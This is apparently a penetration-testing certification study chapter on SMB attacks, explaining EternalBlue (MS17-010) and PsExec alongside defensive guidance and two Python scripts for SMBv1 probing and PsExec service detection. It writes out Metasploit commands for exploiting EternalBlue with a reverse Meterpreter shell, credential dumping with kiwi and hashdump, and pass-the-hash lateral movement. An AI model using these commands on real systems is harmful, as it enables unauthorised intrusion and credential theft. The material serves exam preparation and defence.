PT0-002 | Chapter 56 of 104 | Objective 3.1

SMB Exploitation: EternalBlue and PsExec

This chapter covers the exploitation of the Server Message Block (SMB) protocol, focusing on two critical tools: EternalBlue (MS17-010 exploit) and PsExec. Understanding these attacks is vital for the PT0-002 exam, as they represent classic examples of exploiting legacy protocols and leveraging post-exploitation tools for lateral movement. Approximately 5-8% of exam questions touch on SMB exploitation, vulnerability scanning, and remote execution techniques. Mastering this content will help you identify, execute, and defend against these attacks in penetration testing scenarios.

25 min read
Intermediate
Updated May 31, 2026

The Bank Vault and Master Key Heist

Imagine a high-security bank vault with a complex locking mechanism. The vault's locking system has a critical flaw: a hidden maintenance port used by technicians to reset the lock in emergencies. An attacker learns about this port and crafts a special tool that sends a series of precise electrical pulses to the port, causing the lock's firmware to crash and enter an unsafe state, granting full access without the combination. Once inside, the attacker uses a master key (a privileged token) that allows them to open any safety deposit box or execute any command on the bank's internal network. This master key can be used to remotely install malware, extract data, or move laterally to other branches. The attack succeeds because the bank never patched the maintenance port vulnerability and the master key was left in a default configuration. The SMB exploitation chain works similarly: EternalBlue exploits a buffer overflow in the SMBv1 protocol (the maintenance port) to gain SYSTEM-level access (the master key), and PsExec then uses that access to execute commands remotely, like opening all the deposit boxes.

How It Actually Works

What is SMB and Why is it a Target?

Server Message Block (SMB) is a network file sharing protocol that allows applications to read and write to files and request services from server programs in a computer network. Originally developed by IBM, SMB has been heavily used in Windows environments for file sharing, printer sharing, and remote administration. The protocol operates at the application layer over TCP port 445 (direct SMB) or port 139 (NetBIOS over TCP/IP). SMBv1, introduced in the 1980s, is notoriously insecure and was the vector for the WannaCry ransomware attack in 2017. The PT0-002 exam tests your ability to exploit SMB vulnerabilities, specifically EternalBlue (MS17-010) which targets SMBv1, and to use PsExec for remote command execution.

EternalBlue (MS17-010) – The Buffer Overflow Exploit

EternalBlue is an exploit developed by the U.S. National Security Agency (NSA) and leaked by the Shadow Brokers group in 2017. It targets a vulnerability in Microsoft's implementation of the SMBv1 protocol, officially designated MS17-010 (CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147). The vulnerability lies in how SMBv1 handles certain crafted packets, specifically in the SrvOs2FeaListSizeToNt function of the srv.sys driver, which computes the size of a File Extended Attributes (FEA) list. An attacker can send a specially crafted packet to a target SMBv1 server, causing a buffer overflow that allows arbitrary code execution with SYSTEM privileges.

#### How EternalBlue Works Internally

The exploit works by sending a series of SMB packets that trigger a race condition and a buffer overflow. Here is a step-by-step mechanism:

1. Initial Negotiation: The attacker sends an SMBv1 negotiate protocol request to the target on TCP port 445. The target responds with its capabilities.
2. Session Setup: The attacker performs a session setup with null credentials (anonymous login) or valid credentials if available. The exploit does not require authentication; it works on unpatched systems even without valid credentials.
3. Tree Connect: The attacker connects to a shared resource, typically the IPC$ share (interprocess communication), using a tree connect request.
4. Trans2 Request: The attacker sends a crafted Trans2 secondary request with a malformed SMB_FEA (File Extended Attributes) list. The vulnerability lies in the SrvOs2FeaListSizeToNt function, which calculates the size of the FEA list. By manipulating the FEA list size fields, the attacker causes a buffer overflow in the non-paged pool memory.
5. Race Condition: The exploit triggers a race condition between two threads in the SMB driver. One thread modifies the FEA list size while another thread uses it, leading to a use-after-free or buffer overflow condition.
6. Shellcode Execution: The overflow overwrites critical kernel structures, allowing the attacker to execute shellcode with SYSTEM privileges. The shellcode typically creates a backdoor or executes a payload.

#### Key Components and Values

Target Port: TCP 445 (SMB over IP)

Vulnerability: Buffer overflow in srv.sys driver

Affected Systems: Windows Vista, Windows 7, Windows Server 2008, Windows Server 2008 R2, Windows 8.1, Windows Server 2012, Windows Server 2012 R2, and early versions of Windows 10 before the MS17-010 patch.

Patch: MS17-010 security update released in March 2017.

Exploit Tools: Metasploit module exploit/windows/smb/ms17_010_eternalblue, AutoBlue-MS17-010 script, and the original EternalBlue binary.

#### Configuration and Verification Commands

To check if a system is vulnerable to MS17-010, you can use the following commands:

Nmap Script: `nmap -p 445 --script smb-vuln-ms17-010 <target>`

Metasploit Scanner: `use auxiliary/scanner/smb/smb_ms17_010`, then `set RHOSTS <target>` and `run`

Manual Check: Send a crafted packet using a Python script that mimics the exploit's initial handshake and check for a specific response.

To exploit using Metasploit:

```
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.1.100
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.50
msf6 > exploit
```

PsExec – Remote Command Execution Tool

PsExec is a lightweight telnet-replacement tool from Microsoft Sysinternals that allows you to execute processes on remote systems. It works by copying a small binary (psexesvc.exe) to the remote system's ADMIN$ share (which maps to C:\Windows), installing a Windows service, and then running commands through that service. PsExec requires administrative credentials on the target and relies on SMB for file copy and service control.

#### How PsExec Works Internally

1. Authentication: The attacker provides valid administrative credentials (username and password) for the target system. PsExec uses these to authenticate over SMB.
2. Service Binary Copy: PsExec connects to the ADMIN$ share on the target (using SMB) and copies psexesvc.exe to C:\Windows\psexesvc.exe. This binary is a small service executable.
3. Service Creation: PsExec uses the Windows Service Control Manager (SCM) remotely via SMB to create a new service named PSEXESVC (or a random name) that points to psexesvc.exe. This is done using the OpenSCManager and CreateService APIs over the svcctl named pipe.
4. Service Start: PsExec starts the service, which runs as SYSTEM on the target. The service listens on a named pipe for commands from the client.
5. Command Execution: The PsExec client sends the command to be executed (e.g., cmd.exe /c whoami) over the named pipe. The service executes the command and returns the output.
6. Cleanup: After execution, PsExec stops and deletes the service, and optionally removes the psexesvc.exe binary.

#### Interaction with EternalBlue

EternalBlue provides a SYSTEM-level shell or a Meterpreter session on the target. From that session, an attacker can upload and run PsExec to move laterally to other systems. For example, after gaining initial access via EternalBlue, the attacker can dump local credentials using Mimikatz, then use those credentials with PsExec to access other machines on the network. This combination is a classic lateral movement technique tested on the PT0-002 exam.

#### Key Components and Values

Ports: TCP 445 (SMB), TCP 135 (RPC Endpoint Mapper), and dynamic high ports for named pipes.

Required Privileges: Administrative rights on the target (local Administrator or domain admin).

Binary: psexec.exe (client) and psexesvc.exe (service).

Service Name: PSEXESVC (or random if -r option is used).

Share Used: ADMIN$ (admin share pointing to C:\Windows).

#### Configuration and Verification Commands

Basic PsExec command: `psexec \\192.168.1.100 -u Administrator -p P@ssw0rd cmd.exe`

Using Metasploit's PsExec module: `use exploit/windows/smb/psexec`, then set `RHOSTS`, `SMBUser`, `SMBPass`, and `PAYLOAD`.

Verification: Check if the target has SMB port 445 open and if the ADMIN$ share is accessible with credentials.

Defense and Detection

Defending against EternalBlue and PsExec involves:

- Disabling SMBv1: SMBv1 is deprecated and should be disabled on all systems. Use PowerShell: `Set-SmbServerConfiguration -EnableSMB1Protocol $false`.
- Patching: Apply MS17-010 and subsequent security updates.
- Network Segmentation: Restrict SMB traffic to trusted networks only.
- Monitoring: Enable logging of SMB connections and service creation events (Event ID 7045 for service creation).
- Least Privilege: Limit administrative accounts and use strong passwords.
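Disabling SMBv1 is only useful if you can confirm it took effect on every host. The following script, an added example that is not part of the page, sends a plain SMB1 Negotiate Protocol request offering only the NT LM 0.12 dialect and classifies the reply: a host that still speaks SMBv1 answers in SMB1, while a host with SMBv1 off usually resets or closes the connection. The header flag values and the function names are the example's own, and the replies used for the offline check are constructed.

```python
import socket
import struct

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72
NT_LM_012 = b"NT LM 0.12"  # only SMB1 dialect offered; no SMB2 dialect, so an SMB1 reply means SMBv1 is on


def smb1_header(command, status=0, flags=0x18, flags2=0xC853, tid=0xFFFF, pid=0x1234, mid=1):
    """32-byte little-endian SMB1 header (protocol id, command, status, flags, flags2,
    PIDHigh, SecurityFeatures, reserved, TID, PID, UID, MID)."""
    return struct.pack("<4sBIBHHQHHHHH", SMB1_MAGIC, command, status, flags, flags2,
                       0, 0, 0, tid, pid, 0, mid)


def build_smb1_negotiate():
    """NetBIOS-framed SMB_COM_NEGOTIATE request that offers only NT LM 0.12."""
    dialects = b"\x02" + NT_LM_012 + b"\x00"                      # BufferFormat 0x02 + NUL-terminated name
    body = b"\x00" + struct.pack("<H", len(dialects)) + dialects  # WordCount=0, ByteCount, dialect data
    smb = smb1_header(SMB_COM_NEGOTIATE) + body
    return struct.pack(">I", len(smb)) + smb                      # session message: 0x00 + 3-byte length


def classify_negotiate_response(data):
    """Return 'smb1', 'smb2', 'refused' or 'invalid' for a raw reply (NetBIOS header included)."""
    smb = data[4:]
    if smb[:4] == SMB2_MAGIC:
        return "smb2"  # server answered in SMB2 although none was offered: not an SMBv1 hit
    if smb[:4] != SMB1_MAGIC or len(smb) < 35 or smb[4] != SMB_COM_NEGOTIATE:
        return "invalid"
    status = struct.unpack_from("<I", smb, 5)[0]
    word_count = smb[32]
    dialect_index = struct.unpack_from("<H", smb, 33)[0]
    if status != 0 or word_count == 0 or dialect_index == 0xFFFF:
        return "refused"  # 0xFFFF: the server accepted none of the offered dialects
    return "smb1"  # DialectIndex 0 selects NT LM 0.12: SMBv1 is enabled on this host


def probe_smb1(host, port=445, timeout=3.0):
    """Live check (network I/O, not exercised offline); SMBv1-off hosts typically reset or stay silent."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(build_smb1_negotiate())
            reply = sock.recv(4096)
    except OSError:
        return "no-response"
    return classify_negotiate_response(reply) if reply else "closed"


def sample_smb1_reply(dialect_index=0):
    """Constructed SMBv1 NEGOTIATE response (WordCount 17, the NT LM 0.12 layout)."""
    params = struct.pack("<H", dialect_index) + b"\x00" * 32  # DialectIndex + remaining 16 words
    smb = smb1_header(SMB_COM_NEGOTIATE, flags=0x98) + bytes([17]) + params + b"\x00\x00"
    return struct.pack(">I", len(smb)) + smb


SAMPLE_SMB2_REPLY = struct.pack(">I", 64) + SMB2_MAGIC + b"\x00" * 60  # constructed SMB2 reply

if __name__ == "__main__":
    print(classify_negotiate_response(sample_smb1_reply()))        # smb1
    print(classify_negotiate_response(sample_smb1_reply(0xFFFF)))  # refused
    print(classify_negotiate_response(SAMPLE_SMB2_REPLY))          # smb2
```

Run `probe_smb1()` against your own hosts after pushing the `Set-SmbServerConfiguration` change; any host still returning `smb1` has not picked up the setting.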

Detection of EternalBlue exploitation can be done via network intrusion detection systems (NIDS) that look for specific SMB packet patterns, such as a large Trans2 request with malformed FEA lists. PsExec usage can be detected by monitoring for the creation of the PSEXESVC service (Event ID 7045) or the presence of psexesvc.exe in C:\Windows.
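The Event ID 7045 detection described above can be turned into a small triage script. The example below is added here and is not code from the page: it parses System-log records in the EVTX XML export shape, flags the PSEXESVC service name or a psexesvc.exe binary, and, as a heuristic that goes beyond the exact names, also flags any LocalSystem service installed straight from the Windows root, which is where ADMIN$ maps (this also catches the renamed `-r` case). The records are constructed samples, `%SystemRoot%` is assumed to be `C:\Windows`, and the function names are the example's own.

```python
import re
import xml.etree.ElementTree as ET

EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
SERVICE_INSTALL = 7045  # Service Control Manager: "A service was installed in the system"


def parse_event(xml_text):
    """Flatten one System-log record (EVTX XML export shape) into a dict of the fields used here."""
    root = ET.fromstring(xml_text)
    fields = {"event_id": int(root.findtext("e:System/e:EventID", namespaces=EVT_NS)),
              "computer": root.findtext("e:System/e:Computer", namespaces=EVT_NS)}
    for d in root.findall("e:EventData/e:Data", namespaces=EVT_NS):
        fields[d.get("Name")] = (d.text or "").strip()
    return fields


def normalise_image_path(image):
    """Strip quotes and expand %SystemRoot% (assumed to be C:\\Windows) so paths compare cleanly."""
    image = image.strip().strip('"')
    if image.lower().startswith("%systemroot%"):
        image = "C:\\Windows" + image[len("%SystemRoot%"):]
    return image


def assess_service_install(ev):
    """Return (severity, reason) for a 7045 record matching the PsExec pattern, else None."""
    if ev.get("event_id") != SERVICE_INSTALL:
        return None
    name = ev.get("ServiceName", "")
    image = normalise_image_path(ev.get("ImagePath", ""))
    if name.upper() == "PSEXESVC" or image.lower().endswith("\\psexesvc.exe"):
        return ("high", "PsExec service name or binary (PSEXESVC / psexesvc.exe)")
    # Heuristic beyond the exact names: a LocalSystem service whose binary sits directly in the
    # Windows root (the directory ADMIN$ exposes) matches the PsExec drop pattern, renamed or not.
    in_windows_root = re.fullmatch(r"c:\\windows\\[^\\]+\.exe", image.lower()) is not None
    if in_windows_root and ev.get("AccountName", "").lower() == "localsystem":
        return ("medium", "LocalSystem service installed from the Windows root (ADMIN$ drop)")
    return None


def scan_service_installs(xml_records):
    """Run the check over many records; returns (computer, service, severity, reason) per hit."""
    hits = []
    for rec in xml_records:
        ev = parse_event(rec)
        verdict = assess_service_install(ev)
        if verdict:
            hits.append((ev["computer"], ev.get("ServiceName", ""), *verdict))
    return hits


def make_record(computer, name, image, account="LocalSystem", event_id=SERVICE_INSTALL):
    """Constructed sample record in the EVTX XML shape (not a real export; reduced to the fields used)."""
    return (f'<Event xmlns="{EVT_NS["e"]}"><System><Provider Name="Service Control Manager"/>'
            f'<EventID>{event_id}</EventID><Computer>{computer}</Computer></System><EventData>'
            f'<Data Name="ServiceName">{name}</Data><Data Name="ImagePath">{image}</Data>'
            f'<Data Name="ServiceType">user mode service</Data><Data Name="StartType">demand start</Data>'
            f'<Data Name="AccountName">{account}</Data></EventData></Event>')


SAMPLE_RECORDS = [  # constructed; host and service names are placeholders
    make_record("WS01", "PSEXESVC", "%SystemRoot%\\PSEXESVC.exe"),
    make_record("WS02", "krnlsvc", "C:\\Windows\\krnlsvc.exe"),                     # renamed (-r) pattern
    make_record("WS03", "VendorAgent", '"C:\\Program Files\\Vendor\\agent.exe"'),  # benign install
    make_record("WS03", "PSEXESVC", "%SystemRoot%\\PSEXESVC.exe", event_id=7036),  # not an install event
]

if __name__ == "__main__":
    for hit in scan_service_installs(SAMPLE_RECORDS):
        print(hit)
```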

Walk-Through

1. Scan for SMB Vulnerabilities

Use Nmap or Metasploit to scan the target for SMB vulnerabilities. Run `nmap -p 445 --script smb-vuln-ms17-010 <target>` to check if the target is vulnerable to EternalBlue. The script sends a crafted SMB packet that triggers a specific response if the system is unpatched. Alternatively, use Metasploit's auxiliary scanner `smb_ms17_010` to perform the same check. This step identifies potential targets for exploitation.

2. Exploit EternalBlue for Initial Access

Once a vulnerable target is identified, launch the EternalBlue exploit. In Metasploit, run `use exploit/windows/smb/ms17_010_eternalblue`, set the payload to a reverse shell (e.g., `windows/x64/meterpreter/reverse_tcp`), and set `RHOSTS`, `LHOST`, and `LPORT`. Run the exploit. The exploit sends a series of malformed SMB packets that trigger a buffer overflow in the SMB driver, resulting in arbitrary code execution with SYSTEM privileges. A successful exploit opens a Meterpreter session.

3. Dump Credentials from the Victim

With a Meterpreter session on the victim, use the `kiwi` module (Mimikatz) to dump local credentials. Run `load kiwi` then `creds_all` to retrieve hashed passwords. Alternatively, use the `hashdump` command to dump the SAM database. This step gathers administrative credentials that can be used to move laterally to other systems. The credentials may be in NTLM hash format, which can be used for pass-the-hash attacks.

4. Use PsExec for Lateral Movement

With administrative credentials obtained, use PsExec to execute commands on other target systems. In Metasploit, run `use exploit/windows/smb/psexec`. Set `RHOSTS` to a new target, `SMBUser` to the administrator username, `SMBPass` to the NTLM hash or password, and set a payload (e.g., `windows/meterpreter/reverse_tcp`). Run the exploit. PsExec copies the service binary to the ADMIN$ share, creates and starts a service, and executes the payload. This grants a new Meterpreter session on the lateral target.

5. Post-Exploitation and Pivoting

After gaining access to multiple systems, perform post-exploitation actions such as keylogging, screen capture, and data exfiltration. Use the compromised systems as pivots to reach deeper network segments. For example, use the `autoroute` module in Metasploit to route traffic through the compromised host to access internal networks. This step demonstrates full network compromise, which is the goal of a penetration test. Clean up traces by deleting uploaded binaries and stopping services.

What This Looks Like on the Job

In a typical enterprise penetration test, SMB exploitation is often the quickest path to domain admin. Consider a scenario where a company has a legacy Windows Server 2008 R2 system running an internal file share. This server is unpatched and has SMBv1 enabled because it shares files with older equipment. The penetration tester scans the internal network and identifies this server as vulnerable to EternalBlue. Exploiting it yields SYSTEM access. From there, the tester dumps credentials and finds a local administrator password that is reused across all workstations. Using PsExec, the tester moves laterally to the domain controller, gaining full control. This scenario is common in environments with poor patch management and password reuse.

Another scenario involves a healthcare organization with a mix of Windows 7 machines in a clinical network. The tester uses EternalBlue to compromise a nurse's station, then uses PsExec to deploy ransomware simulation to test incident response. The test demonstrates that the network segmentation between clinical and administrative networks is insufficient, as SMB traffic flows freely. The tester recommends disabling SMBv1, implementing network access control (NAC), and enforcing strong unique passwords.

Performance considerations: EternalBlue exploits can be noisy and may crash the target if the exploit fails (blue screen). In production, testers must be careful to avoid denial of service. PsExec is reliable but leaves traces in the Windows event logs (service creation event 7045). For stealth, testers may use alternatives like WMI or PowerShell remoting. Misconfiguration of SMB shares, such as allowing null sessions or enabling guest access, can also be exploited. Common mistakes include leaving SMBv1 enabled for backward compatibility without compensating controls, and using the same local administrator password across all systems (Pass-the-Hash vulnerability).

How PT0-002 Actually Tests This

The PT0-002 exam tests SMB exploitation in the context of Attacks and Exploits (Objective 3.1). Specifically, you must understand the mechanics of EternalBlue (MS17-010) and how PsExec is used for lateral movement. Common wrong answers include:

1. Thinking EternalBlue requires authentication: Many candidates believe the exploit needs valid credentials. In reality, EternalBlue works against unpatched SMBv1 without authentication. The vulnerability is pre-authentication.
2. Confusing PsExec with other remote execution tools: PsExec uses SMB and the ADMIN$ share. Candidates often mistake it for WMI (port 135) or WinRM (port 5985/5986). PsExec specifically copies a service binary and creates a service.
3. Assuming EternalBlue only works on Windows 7: While Windows 7 is a common target, the vulnerability affects many versions including Windows Server 2008, 2008 R2, 2012, and early Windows 10 builds before the patch.
4. Mixing up ports: SMB over IP uses TCP 445; NetBIOS over TCP/IP uses TCP 139. PsExec primarily uses 445, but also touches 135 for RPC. Exam questions may ask which port is used for SMB directly.

Numbers to memorize: MS17-010, CVE-2017-0144 (primary), TCP 445, service name PSEXESVC, ADMIN$ share. Edge cases: EternalBlue can be exploited on Windows 10 version 1511 and earlier (before patch). PsExec can be used with a hash (pass-the-hash) using the -hashes option in Metasploit. The exam may present a scenario where you have a hash but not a password – PsExec can still work with the hash.

To eliminate wrong answers, focus on the underlying mechanism: EternalBlue is a buffer overflow in the SMBv1 driver (srv.sys) triggered by a crafted Trans2 packet. PsExec is a service-based execution method that requires admin credentials and SMB access to ADMIN$. If the question mentions 'null session' or 'guest access', it's likely about SMB enumeration, not EternalBlue.

Key Takeaways

EternalBlue (MS17-010) exploits SMBv1 on TCP port 445 without requiring authentication.

The vulnerability is a buffer overflow in the srv.sys driver triggered by a crafted Trans2 packet.

PsExec copies psexesvc.exe to ADMIN$, creates a service, and executes commands as SYSTEM.

PsExec requires administrative credentials but can use NTLM hashes via pass-the-hash.

EternalBlue affects Windows Vista, 7, 8.1, Server 2008/2008R2/2012/2012R2, and early Windows 10.

Disabling SMBv1 and applying MS17-010 patch are critical defenses.

Detection: Event ID 7045 for service creation (PsExec), and anomalous SMB packets for EternalBlue.

Metasploit modules: exploit/windows/smb/ms17_010_eternalblue and exploit/windows/smb/psexec.

Easy to Mix Up

These come up on the exam all the time. Here's how to tell them apart.

| EternalBlue | PsExec |
| --- | --- |
| Exploits SMBv1 buffer overflow (MS17-010) | Legitimate administrative tool from Sysinternals |
| No authentication required | Requires valid administrative credentials |
| Grants SYSTEM-level remote code execution | Executes commands via service creation |
| Targets unpatched Windows systems | Works on fully patched systems if credentials are known |
| Often used for initial access | Used for lateral movement after initial access |

Watch Out for These

Mistake: EternalBlue requires valid credentials to exploit.

Correct: EternalBlue exploits a pre-authentication vulnerability in SMBv1. No credentials are needed; the exploit sends crafted packets before authentication completes.

Mistake: PsExec only works with a password, not hashes.

Correct: PsExec can be used with NTLM hashes via pass-the-hash techniques. In Metasploit, the psexec module accepts an SMBPass value that can be an NTLM hash.

Mistake: EternalBlue only affects Windows 7.

Correct: MS17-010 affects a wide range of Windows versions including Vista, 7, 8.1, Server 2008, 2008 R2, 2012, 2012 R2, and early Windows 10 builds before the March 2017 patch.

Mistake: SMB uses TCP port 139 for direct SMB communication.

Correct: Direct SMB over TCP uses port 445. Port 139 is used for the NetBIOS session service, which can transport SMB but is older and less common.

Mistake: PsExec requires the target to have a writable ADMIN$ share.

Correct: PsExec requires administrative credentials to access ADMIN$ (which is hidden but writable by admins). If ADMIN$ is not accessible, PsExec fails.


Frequently Asked Questions

What is the difference between EternalBlue and PsExec?

EternalBlue is an exploit that takes advantage of a vulnerability in SMBv1 to gain remote code execution without authentication. PsExec is a legitimate tool that uses SMB to execute commands on remote systems, but it requires valid administrative credentials. EternalBlue is used for initial compromise, while PsExec is used for lateral movement after obtaining credentials.

Can EternalBlue be used on fully patched Windows 10?

No, EternalBlue only works on unpatched systems. Microsoft released MS17-010 in March 2017, which patched the vulnerability. Fully updated Windows 10 systems are not vulnerable. However, some older Windows 10 builds (version 1511 and earlier) may be vulnerable if not updated.

What ports does PsExec use?

PsExec primarily uses TCP port 445 (SMB) to copy files and communicate with the service. It also uses TCP port 135 (RPC Endpoint Mapper) initially to locate the SMB service, and dynamic high ports for named pipes. In practice, allowing SMB (445) is sufficient.

How can I detect PsExec usage on my network?

PsExec creates a service named PSEXESVC (or a random name if -r is used). Monitor Event ID 7045 (service creation) in Windows Event Logs. Also, look for the file psexesvc.exe in C:\Windows. Network monitoring can detect SMB writes to ADMIN$ and subsequent service control requests.

Does EternalBlue work on Windows Server 2019?

No, Windows Server 2019 is not vulnerable to EternalBlue as it does not include SMBv1 by default and is fully patched. However, if SMBv1 is manually enabled and the system is not updated, it could be vulnerable, but this is extremely unlikely.

What is the difference between SMBv1 and SMBv2/3?

SMBv1 is the original protocol from the 1980s, which is insecure and lacks encryption. SMBv2 (introduced in Vista) and SMBv3 (Windows 8/Server 2012) offer improved security, encryption (SMBv3), and performance. EternalBlue only affects SMBv1. SMBv2/3 are not vulnerable to this exploit.

Can I use PsExec with a hash instead of a password?

Yes, PsExec can be used with NTLM hashes through pass-the-hash. In Metasploit's psexec module, set SMBPass to the NTLM hash (LM:NT format). The standalone PsExec tool does not natively support hashes, but tools like impacket's psexec.py do.
